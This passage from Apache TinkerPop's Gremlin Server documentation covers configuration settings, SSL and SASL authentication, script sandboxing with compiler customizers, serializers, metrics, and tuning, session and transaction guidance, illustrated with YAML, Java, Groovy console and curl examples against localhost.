|processors |A `List` of `Map` settings, where each `Map` represents an `OpProcessor` implementation to use along with its configuration. |_none_
|processors[X].className |The full class name of the `OpProcessor` implementation. 
|_none_
|processors[X].config |A `Map` containing `OpProcessor` specific configurations. |_none_
|resultIterationBatchSize |Defines the size in which the result of a request is "batched" back to the client. In other words, if set to `1`, then a result that had ten items in it would get each result sent back individually. If set to `2` the same ten results would come back in five batches of two each. |64
|scriptEngines |A `Map` of `ScriptEngine` implementations to expose through Gremlin Server, where the key is the name given by the `ScriptEngine` implementation. The key must match the name exactly for the `ScriptEngine` to be constructed. The value paired with this key is itself a `Map` of configuration for that `ScriptEngine`. |_none_
|scriptEngines.<name>.imports |A comma separated list of classes/packages to make available to the `ScriptEngine`. |_none_
|scriptEngines.<name>.staticImports |A comma separated list of "static" imports to make available to the `ScriptEngine`. |_none_
|scriptEngines.<name>.scripts |A comma separated list of script files to execute on `ScriptEngine` initialization. `Graph` and `TraversalSource` instance references produced from scripts will be stored globally in Gremlin Server, therefore it is possible to use initialization scripts to add Traversal Strategies or create entirely new `Graph` instances altogether. Instantiating a `LifeCycleHook` in a script provides a way to execute scripts when Gremlin Server starts and stops. |_none_
|scriptEngines.<name>.config |A `Map` of configuration settings for the `ScriptEngine`. These settings are dependent on the `ScriptEngine` implementation being used. |_none_
|scriptEvaluationTimeout |The amount of time in milliseconds before a script evaluation times out. The notion of "script evaluation" refers to the time it takes for the `ScriptEngine` to do its work and *not* any additional time it takes for the result of the evaluation to be iterated and serialized. This feature can be turned off by setting the value to `0`. |30000
|serializers |A `List` of `Map` settings, where each `Map` represents a `MessageSerializer` implementation to use along with its configuration. |_none_
|serializers[X].className |The full class name of the `MessageSerializer` implementation. |_none_
|serializers[X].config |A `Map` containing `MessageSerializer` specific configurations. |_none_
|serializedResponseTimeout |The amount of time in milliseconds before a response serialization times out. The notion of "response serialization" refers to the time it takes for Gremlin Server to iterate an entire result after the script is evaluated in the `ScriptEngine`. |30000
|ssl.enabled |Determines if SSL is turned on or not. |false
|ssl.keyCertChainFile |The X.509 certificate chain file in PEM format. If this value is not present and `ssl.enabled` is `true` a self-signed certificate will be used (not suitable for production). |_none_
|ssl.keyFile |The `PKCS#8` private key file in PEM format. If this value is not present and `ssl.enabled` is `true` a self-signed certificate will be used (not suitable for production). |_none_
|ssl.keyPassword |The password of the `keyFile` if it's password-protected. |_none_
|ssl.trustCertChainFile |Trusted certificates for verifying the remote endpoint's certificate. The file should contain an X.509 certificate chain in PEM format. A system default will be used if this setting is not present. 
|_none_
|strictTransactionManagement |Set to `true` to require `aliases` to be submitted on every request, where the `aliases` become the scope of transaction management. |false
|threadPoolBoss |The number of threads available to Gremlin Server for accepting connections. Should always be set to `1`. |1
|threadPoolWorker |The number of threads available to Gremlin Server for processing non-blocking reads and writes. |1
|writeBufferHighWaterMark |If the number of bytes in the network send buffer exceeds this value then the channel is no longer writeable, accepting no additional writes until the buffer is drained and the `writeBufferLowWaterMark` is met. |65536
|writeBufferLowWaterMark |Once the number of bytes queued in the network send buffer exceeds the `writeBufferHighWaterMark`, the channel will not become writeable again until the buffer is drained and it drops below this value. |65536
|=========================================================

NOTE: Configuration of link:http://ganglia.sourceforge.net/[Ganglia] requires an additional library that is not
packaged with Gremlin Server due to its LGPL licensing, which conflicts with TinkerPop's Apache 2.0 license. To
run Gremlin Server with Ganglia monitoring, download the `org.acplt:oncrpc` jar from
link:http://repo1.maven.org/maven2/org/acplt/oncrpc/1.0.7/[here] and copy it to the Gremlin Server `/lib` directory
before starting the server.

Security
^^^^^^^^

image:gremlin-server-secure.png[width=175,float=right] Gremlin Server provides several features that aid in the
security of the graphs that it exposes. It has built-in SSL support and a pluggable authentication framework using
link:https://en.wikipedia.org/wiki/Simple_Authentication_and_Security_Layer[SASL] (Simple Authentication and
Security Layer). SSL options are described in the configuration settings table above, so this section will focus on
authentication.

By default, Gremlin Server is configured to allow all requests to be processed (i.e. no authentication). To enable
authentication, Gremlin Server must be configured with an `Authenticator` implementation in its YAML file. Gremlin
Server comes packaged with an implementation called `SimpleAuthenticator`. The `SimpleAuthenticator` implements the
`PLAIN` SASL mechanism (i.e. plain text) to authenticate a request. 
It validates username/password pairs against a
graph database, which must be provided to it as part of the configuration.

[source,yaml]
authentication: {
 className: org.apache.tinkerpop.gremlin.server.auth.SimpleAuthenticator,
 config: {
 credentialsDb: conf/tinkergraph-credentials.properties}}

Quick Start
+++++++++++

A quick way to get started with the `SimpleAuthenticator` is to use TinkerGraph for the "credentials graph" and the
"sample" credentials graph that is packaged with the server.

[source,text]
----
$ bin/gremlin-server.sh conf/gremlin-server-secure.yaml
[INFO] GremlinServer -
 \,,,/
 (o o)
-----oOOo-(3)-oOOo-----

[INFO] GremlinServer - Configuring Gremlin Server from conf/gremlin-server-secure.yaml
...
[WARN] AbstractChannelizer - Enabling SSL with self-signed certificate (NOT SUITABLE FOR PRODUCTION)
[INFO] AbstractChannelizer - SSL enabled
[INFO] SimpleAuthenticator - Initializing authentication with the org.apache.tinkerpop.gremlin.server.auth.SimpleAuthenticator
[INFO] SimpleAuthenticator - CredentialGraph initialized at CredentialGraph{graph=tinkergraph[vertices:1 edges:0]}
[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 8 and boss thread pool of 1.
[INFO] GremlinServer$1 - Channel started at port 8182.
----

In addition to configuring the authenticator, `gremlin-server-secure.yaml` also enables SSL with a self-signed
certificate. As SSL is enabled on the server it must also be enabled on the client when connecting. To connect to
Gremlin Server with `gremlin-driver`, set the `credentials` and `enableSsl` when constructing the `Cluster`.

[source,java]
Cluster cluster = Cluster.build().credentials("stephen", "password")
 .enableSsl(true).create();

If connecting with Gremlin Console, which utilizes `gremlin-driver` for remote script execution, use the provided
`conf/remote-secure.yaml` file when defining the remote. That file contains configuration for the username and
password as well as enablement of SSL from the client side.

Similarly, Gremlin Server can be configured to combine REST and security.

[source,text]
----
$ bin/gremlin-server.sh conf/gremlin-server-rest-secure.yaml
[INFO] GremlinServer -
 \,,,/
 (o o)
-----oOOo-(3)-oOOo-----

[INFO] GremlinServer - Configuring Gremlin Server from conf/gremlin-server-rest-secure.yaml
...
[WARN] AbstractChannelizer - Enabling SSL with self-signed certificate (NOT SUITABLE FOR PRODUCTION)
[INFO] AbstractChannelizer - SSL enabled
[INFO] SimpleAuthenticator - Initializing authentication with the org.apache.tinkerpop.gremlin.server.auth.SimpleAuthenticator
[INFO] SimpleAuthenticator - CredentialGraph initialized at CredentialGraph{graph=tinkergraph[vertices:1 edges:0]}
[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 8 and boss thread pool of 1.
[INFO] GremlinServer$1 - Channel started at port 8182.
----

Once the server has started, issue a request passing the credentials with an `Authorization` header, as described in link:http://tools.ietf.org/html/rfc2617#section-2[RFC2617]. 
Here's an HTTP Basic authentication example with cURL:

[source,text]
curl -X POST --insecure -u stephen:password -d "{\"gremlin\":\"100-1\"}" "https://localhost:8182"

[[credentials-dsl]]
Credentials Graph DSL
+++++++++++++++++++++

The "credentials graph", which has been mentioned in previous sections, is used by Gremlin Server to hold the list of
users who can authenticate to the server. It is possible to use virtually any `Graph` instance for this task as long
as it complies with a defined schema. The credentials graph stores users as vertices with the `label` of "user". Each
"user" vertex has two properties: `username` and `password`. Naturally, these are both `String` values. The password
must not be stored in plain text and should be hashed.

IMPORTANT: Be sure to define an index on the `username` property, as this will be used for lookups. If supported by
the `Graph`, consider specifying a unique constraint as well.

To aid with the management of a credentials graph, Gremlin Server provides a Gremlin Console plugin which can be
used to add and remove users so as to ensure that the schema is adhered to, thus ensuring compatibility with Gremlin
Server. In addition, as it is a plugin, it works naturally in the Gremlin Console as an extension of its
capabilities (though one could use it programmatically, if desired). This plugin is distributed with the Gremlin
Console so it does not have to be "installed". It does however need to be activated:

[source,groovy]
gremlin> :plugin use tinkerpop.credentials
==>tinkerpop.credentials activated

Example usage follows:

[gremlin-groovy]
----
graph = TinkerGraph.open()
graph.createIndex("username",Vertex.class)
credentials = credentials(graph)
credentials.createUser("stephen","password")
credentials.createUser("daniel","better-password")
credentials.createUser("marko","rainbow-dash")
credentials.findUser("marko").properties()
credentials.countUsers()
credentials.removeUser("daniel")
credentials.countUsers()
----

[[script-execution]]
Script Execution
++++++++++++++++

It is important to remember that Gremlin Server exposes a `ScriptEngine` instance that allows for remote execution
of arbitrary code on the server. Obviously, this situation can represent a security risk or, more minimally, provide
ways for "bad" scripts to be inadvertently executed. A simple example of a "valid" Gremlin script that would cause
some problems would be `while(true) {}`, which would consume a thread in the Gremlin pool indefinitely, thus
preventing it from serving other requests. Sending enough of these kinds of scripts would eventually consume all
available threads and Gremlin Server would stop responding.

Gremlin Server (more specifically the `GremlinGroovyScriptEngine`) provides methods to protect itself from these
kinds of troublesome scripts. A user can configure the script engine with different `CompilerCustomizerProvider`
implementations. 
Consider the basic configuration from the Gremlin Server YAML file:

[source,yaml]
scriptEngines: {
 gremlin-groovy: {
 imports: [java.lang.Math],
 staticImports: [java.lang.Math.PI],
 scripts: [scripts/empty-sample.groovy]}}

This configuration can be extended to include a `config` key as follows:

[source,yaml]
scriptEngines: {
 gremlin-groovy: {
 imports: [java.lang.Math],
 staticImports: [java.lang.Math.PI],
 scripts: [scripts/empty-sample.groovy],
 config: {
 compilerCustomizerProviders: {
 "org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.TimedInterruptCustomizerProvider":[10000] }}}

This configuration sets up the script engine with a `CompilerCustomizerProvider` implementation. The
`TimedInterruptCustomizerProvider` injects checks that ensure that loops (like `while`) can only execute for `10000`
milliseconds. With this configuration in place, a remote execution like the following now times out rather than
consuming the thread continuously:

[source,groovy]
gremlin> :remote connect tinkerpop.server conf/remote.yaml
==>Configured localhost/127.0.0.1:8182
gremlin> :> while(true) { }
Execution timed out after 10000 units. Start time: Fri Jul 24 11:04:52 EDT 2015

There are a number of pre-packaged `CustomizerProvider` implementations:

[width="100%",cols="3,10a",options="header"]
|=========================================================
|Customizer |Description
|`CompileStaticCustomizerProvider` |Applies `CompileStatic` annotations to incoming scripts thus removing dynamic dispatch. More information about static compilation can be found in the link:http://docs.groovy-lang.org/latest/html/documentation/#_static_compilation[Groovy Documentation]. It is possible to configure this `CustomizerProvider` by specifying a comma separated list of link:http://docs.groovy-lang.org/latest/html/documentation/#Typecheckingextensions-Workingwithextensions[type checking extensions] that can have the effect of securing calls to various methods.
|`ThreadInterruptCustomizerProvider` |Injects checks for thread interruption, thus allowing the thread to potentially respect calls to `Thread.interrupt()`.
|`TimedInterruptCustomizerProvider` |Injects checks into loops to interrupt them if they exceed the configured timeout in milliseconds.
|`TypeCheckedCustomizerProvider` |Similar to the above-mentioned `CompileStaticCustomizerProvider`, the `TypeCheckedCustomizerProvider` injects `TypeChecked` annotations to incoming scripts. More information on the nature of this annotation can be found in the link:http://docs.groovy-lang.org/latest/html/documentation/#_the_code_typechecked_code_annotation[Groovy Documentation]. 
It too takes a comma separated list of link:http://docs.groovy-lang.org/latest/html/documentation/#Typecheckingextensions-Workingwithextensions[type checking extensions].
|=========================================================

To provide some basic out-of-the-box protections against troublesome scripts, the following configuration can be used:

[source,yaml]
scriptEngines: {
 gremlin-groovy: {
 imports: [java.lang.Math],
 staticImports: [java.lang.Math.PI],
 scripts: [scripts/empty-sample.groovy],
 config: {
 compilerCustomizerProviders: {
 "org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.ThreadInterruptCustomizerProvider":[],
 "org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.TimedInterruptCustomizerProvider":[10000],
 "org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.CompileStaticCustomizerProvider":["org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.SimpleSandboxExtension"]}}}}

NOTE: The above configuration could also use the `TypeCheckedCustomizerProvider` in place of the
`CompileStaticCustomizerProvider`. The differences between `TypeChecked` and `CompileStatic` are beyond the scope of
this documentation. Consult the latest link:http://docs.groovy-lang.org/latest/html/documentation/#_typing[Groovy Documentation]
for information on the differences. It is important to understand the impact that these configurations will have on
submitted scripts before enabling this feature.

NOTE: The import of classes to the script engine is handled by the `ImportCustomizerProvider`. As the concept of
"imports" is a first-class citizen (i.e. has its own configuration options), it is not recommended that the
`ImportCustomizerProvider` be used as a configuration option to `compilerCustomizerProviders`.

This configuration uses the `SimpleSandboxExtension`, which blacklists calls to methods on the `System` class,
thereby preventing someone from remotely killing the server:

[source,groovy]
----
gremlin> :> System.exit(0)
Script8.groovy: 1: [Static type checking] - Not authorized to call this method: java.lang.System#exit(int)
 @ line 1, column 1.
 System.exit(0)
 ^

1 error
----

The `SimpleSandboxExtension` is by no means a "complete" implementation protecting against all manner of nefarious
scripts, but it does provide an example for how such a capability might be implemented. 
A more complete implementation
is offered in the `FileSandboxExtension`, which uses a configuration file to white list certain classes and methods.
The configuration file is YAML-based and an example is presented as follows:

[source,yaml]
----
autoTypeUnknown: true
methodWhiteList:
 - java\.lang\.Boolean.*
 - java\.lang\.Byte.*
 - java\.lang\.Character.*
 - java\.lang\.Double.*
 - java\.lang\.Enum.*
 - java\.lang\.Float.*
 - java\.lang\.Integer.*
 - java\.lang\.Long.*
 - java\.lang\.Math.*
 - java\.lang\.Number.*
 - java\.lang\.Object.*
 - java\.lang\.Short.*
 - java\.lang\.String.*
 - java\.lang\.StringBuffer.*
 - java\.lang\.System#currentTimeMillis\(\)
 - java\.lang\.System#nanoTime\(\)
 - java\.lang\.Throwable.*
 - java\.lang\.Void.*
 - java\.util\..*
 - org\.codehaus\.groovy\.runtime\.DefaultGroovyMethods.*
 - org\.codehaus\.groovy\.runtime\.InvokerHelper#runScript\(java\.lang\.Class,java\.lang\.String\[\]\)
 - org\.codehaus\.groovy\.runtime\.StringGroovyMethods.*
 - groovy\.lang\.Script#<init>\(groovy.lang.Binding\)
 - org\.apache\.tinkerpop\.gremlin\.structure\..*
 - org\.apache\.tinkerpop\.gremlin\.process\..*
 - org\.apache\.tinkerpop\.gremlin\.process\.computer\..*
 - org\.apache\.tinkerpop\.gremlin\.process\.computer\.bulkloading\..*
 - org\.apache\.tinkerpop\.gremlin\.process\.computer\.clustering\.peerpressure\.*
 - org\.apache\.tinkerpop\.gremlin\.process\.computer\.ranking\.pagerank\.*
 - org\.apache\.tinkerpop\.gremlin\.process\.computer\.traversal\..*
 - org\.apache\.tinkerpop\.gremlin\.process\.traversal\..*
 - org\.apache\.tinkerpop\.gremlin\.process\.traversal\.dsl\.graph\..*
 - org\.apache\.tinkerpop\.gremlin\.process\.traversal\.engine\..*
 - org\.apache\.tinkerpop\.gremlin\.server\.util\.LifeCycleHook.*
staticVariableTypes:
 graph: org.apache.tinkerpop.gremlin.structure.Graph
 g: org.apache.tinkerpop.gremlin.process.traversal.dsl.graph.GraphTraversalSource
----

There are three keys in this configuration file that control different aspects of the sandbox:

. `autoTypeUnknown` - When set to `true`, unresolved variables are typed as `Object`.
. `methodWhiteList` - A white list of classes and methods that follow a regex pattern which can then be matched against
method descriptors to determine if they can be executed. The method descriptor is the fully-qualified class name
of the method, its name and parameters. For example, `Math.ceil` would have a descriptor of
`java.lang.Math#ceil(double)`.
. `staticVariableTypes` - A list of variables that will be used in the `ScriptEngine` for which the types are
always known. In the above example, the variable "graph" will always be bound to a `Graph` instance.

At Gremlin Server startup, the `FileSandboxExtension` looks in the root of the Gremlin Server installation directory for a
file called `sandbox.yaml` and configures itself. To use a file in a different location set the
`gremlinServerSandbox` system property to the location of the file (e.g. `-DgremlinServerSandbox=conf/my-sandbox.yaml`).

The `FileSandboxExtension` provides a basic configurable security function in Gremlin Server. 
More complex
sandboxing implementations can be developed by using this white listing model and extending from the
`AbstractSandboxExtension`.

A final thought on the topic of `CompilerCustomizerProvider` implementations is that they are not just for
"security" (though they are demonstrated in that capacity here). They can be used for a variety of features that
can fine tune the Groovy compilation process. Read more about compilation customization in the
link:http://docs.groovy-lang.org/latest/html/documentation/#compilation-customizers[Groovy Documentation].

Serialization
^^^^^^^^^^^^^

Gremlin Server can accept requests and return results using different serialization formats. The format of the
serialization is configured by the `serializers` setting described in the table above. Note that some serializers
have additional configuration options as defined by the `serializers[X].config` setting. The `config` setting is a
`Map` where the keys and values get passed to the serializer at its initialization. The available and/or expected
keys are dependent on the serializer being used. Gremlin Server comes packaged with two different serializers:
GraphSON and Gryo.

GraphSON
++++++++

The GraphSON serializer produces human readable output in JSON format and is a good configuration choice for those
trying to use TinkerPop from non-JVM languages. JSON obviously has wide support across virtually all major
programming languages and can be consumed by a wide variety of tools.

[source,yaml]
 - { className: org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV1d0 }

The above configuration represents the default serialization under the `application/json` MIME type and produces JSON
consistent with standard JSON data types. It has the following configuration option:

[width="100%",cols="3,10,^2",options="header"]
|=========================================================
|Key |Description |Default
|useMapperFromGraph |Specifies the name of the `Graph` (from the `graphs` `Map` in the configuration file) from which to plug in any custom serializers that are tied to it. |_none_
|=========================================================

[source,yaml]
 - { className: org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerGremlinV1d0 }

When the standard JSON data types are not enough (e.g. the need to identify the difference between `double` and `float`
data types), the above configuration will embed types into the JSON itself. The type embedding uses standard Java
type names, so interpretation from non-JVM languages will be required. It has the MIME type of
`application/vnd.gremlin-v1.0+json` and the following configuration options:

[width="100%",cols="3,10,^2",options="header"]
|=========================================================
|Key |Description |Default
|useMapperFromGraph |Specifies the name of the `Graph` (from the `graphs` `Map` in the configuration file) from which to plug in any custom serializers that are tied to it. |_none_
|=========================================================

Gryo
++++

The Gryo serializer utilizes Kryo-based serialization which produces a binary output. 
This format is best consumed
by JVM-based languages.

[source,yaml]
 - { className: org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerGremlinV1d0 }

It has the MIME type of `application/vnd.gremlin-v1.0+gryo` and the following configuration options:

[width="100%",cols="3,10,^2",options="header"]
|=========================================================
|Key |Description |Default
|bufferSize |The maximum size of the Kryo buffer for use on a single object being serialized. Increasing this value will correct `KryoException` errors that complain of "Buffer too small". |_4096_
|classResolverSupplier |The fully qualified classname of a custom `Supplier<ClassResolver>` which will be used when constructing `Kryo` instances. There is no direct default for this setting, but without a setting the `GryoClassResolver` is used. |_none_
|custom |A list of classes with custom Kryo `Serializer` implementations related to them in the form of `<class>;<serializer-class>`. |_none_
|ioRegistries |A list of `IoRegistry` implementations to be applied to the serializer. |_none_
|serializeResultToString |When set to `true`, results are serialized by first calling `toString()` on each object in the result list, resulting in an extended MIME type of `application/vnd.gremlin-v1.0+gryo-stringd`. When set to `false` Kryo-based serialization is applied. |_false_
|useMapperFromGraph |Specifies the name of the `Graph` (from the `graphs` `Map` in the configuration file) from which to plug in any custom serializers that are tied to it. |_none_
|=========================================================

As described above, there are multiple ways in which to register serializers for Kryo-based serialization. These
configurations can be used in conjunction with one another where there is a specific ordering to how the configurations
are applied. The `useMapperFromGraph` setting is applied first, followed by any `ioRegistries` and finalized by the
`custom` setting.

Those configuring or implementing a `Supplier<ClassResolver>` should consider this an "advanced" option that is
typically important to use cases where server types need to be coerced to client types (i.e. a type is available on
the server but not on the client). Implementations should typically instantiate `ClassResolver` implementations that are
extensions of the `GryoClassResolver` as this class is important to most serialization tasks in TinkerPop.

Metrics
^^^^^^^

Gremlin Server produces metrics about its operations that can yield some insight into how it is performing. These
metrics are exposed in a variety of ways:

* Directly to the console where Gremlin Server is running
* CSV file
* link:http://ganglia.info/[Ganglia]
* link:http://graphite.wikidot.com/[Graphite]
* link:http://www.slf4j.org/[SLF4j]
* link:https://en.wikipedia.org/wiki/Java_Management_Extensions[JMX]

The configuration of each of these outputs is described in the Gremlin Server <<_configuring_2, Configuring>> section.
Regardless of the output, the metrics gathered are the same. 
Each metric is prefixed with
`org.apache.tinkerpop.gremlin.server.GremlinServer` and the following metrics are reported:

* `sessions` - the number of sessions open at the time the metric was last measured.
* `errors` - the number of total errors, mean rate, as well as the 1, 5, and 15-minute error rates.
* `op.eval` - the number of script evaluations, mean rate, 1, 5, and 15 minute rates, minimum, maximum, median, mean,
and standard deviation evaluation times, as well as the 75th, 95th, 98th, 99th and 99.9th percentile evaluation times
(note that these times apply to both sessionless and in-session requests).

Best Practices
~~~~~~~~~~~~~~

The following sections define best practices for working with Gremlin Server.

Tuning
^^^^^^

image:gremlin-handdrawn.png[width=120,float=right] Tuning Gremlin Server for a particular environment may require some simple trial-and-error, but the following represent some basic guidelines that might be useful:

* Gremlin Server defaults to a very modest maximum heap size. Consider increasing this value for non-trivial uses. Maximum heap size (`-Xmx`) is defined with the `JAVA_OPTIONS` setting in `gremlin-server.sh`.
* When configuring the size of `threadPoolWorker`, start with the default of `1` and increment by one as needed to a maximum of `2*number of cores`.
* The "right" size of the `gremlinPool` setting is somewhat dependent on the type of scripts that will be processed
by Gremlin Server. As requests arrive to Gremlin Server they are decoded and queued to be processed by threads in
this pool. When this pool is exhausted of threads, Gremlin Server will continue to accept incoming requests, but
the queue will continue to grow. If left to grow too large, the server will begin to slow. When tuning around
this setting, consider whether the bulk of the scripts being processed will be "fast" or "slow", where "fast"
generally means being measured in the low hundreds of milliseconds and "slow" means anything longer than that.
** If the bulk of the scripts being processed are expected to be "fast", then a good starting point for this setting is `2*threadPoolWorker`.
** If the bulk of the scripts being processed are expected to be "slow", then a good starting point for this setting is `4*threadPoolWorker`.
* Scripts that are "slow" can really hurt Gremlin Server if they are not properly accounted for. `ScriptEngine`
evaluations are blocking operations that aren't easily interrupted, so once a "slow" script is being evaluated in
the context of a `ScriptEngine` it must finish its work. Lots of "slow" scripts will eventually consume the
`gremlinPool` preventing other scripts from getting processed from the queue.
** To limit the impact of this problem consider properly setting the `scriptEvaluationTimeout` and the `serializedResponseTimeout` to something "sane".
** Test the traversals being sent to Gremlin Server and determine the maximum time they take to evaluate and iterate
over results, then set these configurations accordingly.
** Note that `scriptEvaluationTimeout` does not interrupt the evaluation on timeout. It merely allows Gremlin Server
to "ignore" the result of that evaluation, which means the thread in the `gremlinPool` will still be consumed after
the timeout.
** The `serializedResponseTimeout` will kill the result iteration process and prevent additional processing. 
In most
situations, the iteration and serialization process is the more costly step in this process as an errant script that
returns a million or more results could send Gremlin Server into a long streaming cycle. Script evaluation on the
other hand is usually very fast, occurring on the order of milliseconds, but that is entirely dependent on the
contents of the script itself.

[[parameterized-scripts]]
Parameterized Scripts
^^^^^^^^^^^^^^^^^^^^^

image:gremlin-parameterized.png[width=150,float=left] Use script parameterization. Period. Gremlin Server caches
all scripts that are passed to it. The cache is keyed on a hash of the script. Therefore `g.V(1)` and
`g.V(2)` will be recognized as two separate scripts in the cache. If that script is parameterized to `g.V(x)`
where `x` is passed as a parameter from the client, there will be no additional compilation cost for future requests
on that script. Compilation of a script should be considered "expensive" and avoided when possible.

[source,java]
----
Cluster cluster = Cluster.open();
Client client = cluster.connect();

Map<String,Object> params = new HashMap<>();
params.put("x",4);
client.submit("[1,2,3,x]", params);
----

Cache Management
^^^^^^^^^^^^^^^^

If Gremlin Server processes a large number of unique scripts, the global function cache will grow beyond the memory
available to Gremlin Server and an `OutOfMemoryError` will loom. Script parameterization goes a long way to solving
this problem and running out of memory should not be an issue for those cases. If it is a problem or if there is no
script parameterization for a given use case (perhaps with the use of <<sessions,sessions>>), it is possible to
better control the nature of the global function cache from the client side, by issuing scripts with a parameter to
help define how the garbage collector should treat the references.

The parameter is called `#jsr223.groovy.engine.keep.globals` and has four options:

* `hard` - available in the cache for the life of the JVM (default when not specified).
* `soft` - retained until memory is "low" and should be reclaimed before an `OutOfMemoryError` is thrown.
* `weak` - garbage collected even when memory is abundant.
* `phantom` - removed immediately after being evaluated by the `ScriptEngine`.

By specifying an option other than `hard`, an `OutOfMemoryError` in Gremlin Server should be avoided. Of course,
this approach will come with the downside that functions could be garbage collected and thus removed from the
cache, forcing Gremlin Server to recompile if that script is later encountered.

[source,java]
----
Cluster cluster = Cluster.open();
Client client = cluster.connect();

Map<String,Object> params = new HashMap<>();
params.put("x",4);
params.put("#jsr223.groovy.engine.keep.globals", "soft");
client.submit("[1,2,3,x]", params);
----

[[sessions]]
Considering Sessions
^^^^^^^^^^^^^^^^^^^^

The preferred approach for issuing requests to Gremlin Server is to do so in a sessionless manner. The concept of
"sessionless" refers to a request that is completely encapsulated within a single transaction, such that the script
in the request starts with a new transaction and ends with a closed transaction. Sessionless requests have automatic
transaction management handled by Gremlin Server, thus automatically opening and closing transactions as previously
described. 
The downside to the sessionless approach is that the entire script to be executed must be known at the
time of submission so that it can all be executed at once. This requirement makes it difficult for some use cases
where more control over the transaction is desired.

For such use cases, Gremlin Server supports sessions. With sessions, the user is in complete control of the start
and end of the transaction. This feature comes with some additional expense to consider:

* Initialization scripts will be executed for each session created so any expense related to them will be established
each time a session is constructed.
* There will be one script cache per session, which obviously increases memory requirements. The cache is not shared,
so as to ensure that a session has isolation from other session environments. As a result, if the same script is
executed in each session the same compilation cost will be paid for each session it is executed in.
* Each session will require its own thread pool with a single thread in it - this ensures that transactional
boundaries are managed properly from one request to the next.
* If there are multiple Gremlin Server instances, communication from the client to the server must be bound to the
server that the session was initialized in. Gremlin Server does not share session state as the transactional context
of a `Graph` is bound to the thread it was initialized in.

To connect to a session with Java via the `gremlin-driver`, it is necessary to create a `SessionedClient` from the
`Cluster` object:

[source,java]
----
Cluster cluster = Cluster.open(); <1>
Client client = cluster.connect("sessionName"); <2>
----

<1> Opens a reference to `localhost` as <<connecting-via-java,previously shown>>.
<2> Creates a `SessionedClient` given the configuration options of the `Cluster`. The `connect()` method is given a
`String` value that becomes the unique name of the session. It is often best to simply use a `UUID` to represent
the session.

It is also possible to have Gremlin Server manage the transactions as is done with sessionless requests. The user is
in control of enabling this feature when creating the `SessionedClient`:

[source,java]
----
Cluster cluster = Cluster.open();
Client client = cluster.connect("sessionName", true);
----

Specifying `true` to the `connect()` method signifies that the `client` should make each request as one encapsulated
in a transaction. With this configuration of `client` there is no need to close a transaction manually.

When using this mode of the `SessionedClient` it is important to recognize that global variable state for the session
may not be rolled back on failure, depending on where the failure occurs. For example, sending the following script would
create a variable "x" in global session scope that would be accessible on the next request:

[source,groovy]
x = 1

However, sending this script, which explicitly throws an exception:

[source,groovy]
y = 2
throw new RuntimeException()

will result in an obvious failure during script evaluation and "y" will not be available to the next request. The
complication arises where the script evaluates successfully, but fails during result iteration or serialization. For
example, this script:

[source,groovy]
a = 1
g.addV()

would successfully evaluate and return a `Traversal`. The variable "a" would be available on the next request. However,
if there was a failure in transaction management on the call to `commit()`, "a" would still be available to the next
request.
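
To make the retention of session state concrete, the following is a minimal sketch with `gremlin-driver` - the
scripts are illustrative and the session name is simply a random `UUID` as suggested above:

[source,java]
----
// a minimal sketch of session state - a variable bound by one request is
// referenced by a later one (the scripts are illustrative only)
Cluster cluster = Cluster.open();
Client session = cluster.connect(UUID.randomUUID().toString());

session.submit("x = 2").all().join(); // "x" is retained by the session
int result = session.submit("x + 3").all().join().get(0).getInt(); // 5

session.close();
cluster.close();
----
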
A session is a "heavier" approach to the simple "request/response" approach of sessionless requests, but is sometimes
necessary for a given use case.

[[considering-transactions]]
Considering Transactions
^^^^^^^^^^^^^^^^^^^^^^^^

Gremlin Server performs automated transaction handling for "sessionless" requests (i.e. no state between requests) and
for "in-session" requests with that feature enabled. It will automatically commit or rollback transactions depending
on the success or failure of the request.

Another aspect of transaction management that should be considered is the usage of the `strictTransactionManagement`
setting. It is `false` by default, but when set to `true`, it forces the user to pass `aliases` for all requests.
The aliases are then used to determine which graphs will have their transactions closed for that request. Running
Gremlin Server in this configuration should be more efficient when there are multiple graphs being hosted as
Gremlin Server will only close transactions on the graphs specified by the `aliases`. Keeping this setting `false`
will simply have Gremlin Server close transactions on all graphs for every request.

[[considering-state]]
Considering State
^^^^^^^^^^^^^^^^^

With REST and any sessionless requests, there is no variable state maintained between requests. Therefore,
when <<connecting-via-console,connecting with the console>>, for example, it is not possible to create a variable in
one command and then expect to access it in the next:

[source,groovy]
----
gremlin> :remote connect tinkerpop.server conf/remote.yaml
==>Configured localhost/127.0.0.1:8182
gremlin> :> x = 2
==>2
gremlin> :> 2 + x
No such property: x for class: Script4
Display stack trace? [yN] n
----

The same behavior would be seen with REST or when using sessionless requests through one of the Gremlin Server drivers.
If maintaining state between requests is desirable, then <<sessions,consider sessions>>.

There is an exception to this notion of state not existing between requests: globally defined functions.
All functions created via scripts are global to the server.

[source,groovy]
----
gremlin> :> def subtractIt(int x, int y) { x - y }
==>null
gremlin> :> subtractIt(8,7)
==>1
----

If this behavior is not desirable there are several options. A first option would be to consider using sessions. Each
session gets its own `ScriptEngine`, which maintains its own isolated cache of global functions, whereas sessionless
requests use a single function cache. A second option would be to define functions as closures:

[source,groovy]
----
gremlin> :> multiplyIt = { int x, int y -> x * y }
==>Script7$_run_closure1@6b24f3ab
gremlin> :> multiplyIt(7, 8)
No signature of method: org.apache.tinkerpop.gremlin.groovy.jsr223.GremlinGroovyScriptEngine.multiplyIt() is applicable for argument types: (java.lang.Integer, java.lang.Integer) values: [7, 8]
Display stack trace? [yN]
----

When the function is declared this way, the function is viewed by the `ScriptEngine` as a variable rather than a global
function and since sessionless requests don't maintain state, the function is forgotten for the next request. 
A final
option would be to manage the `ScriptEngine` cache manually:

[source,bourne]
----
$ curl -X POST -d "{\"gremlin\":\"def divideIt(int x, int y){ x / y }\",\"bindings\":{\"#jsr223.groovy.engine.keep.globals\":\"phantom\"}}" "http://localhost:8182"
{"requestId":"97fe1467-a943-45ea-8fd6-9e889a6c9381","status":{"message":"","code":200,"attributes":{}},"result":{"data":[null],"meta":{}}}
$ curl -X POST -d "{\"gremlin\":\"divideIt(8, 2)\"}" "http://localhost:8182"
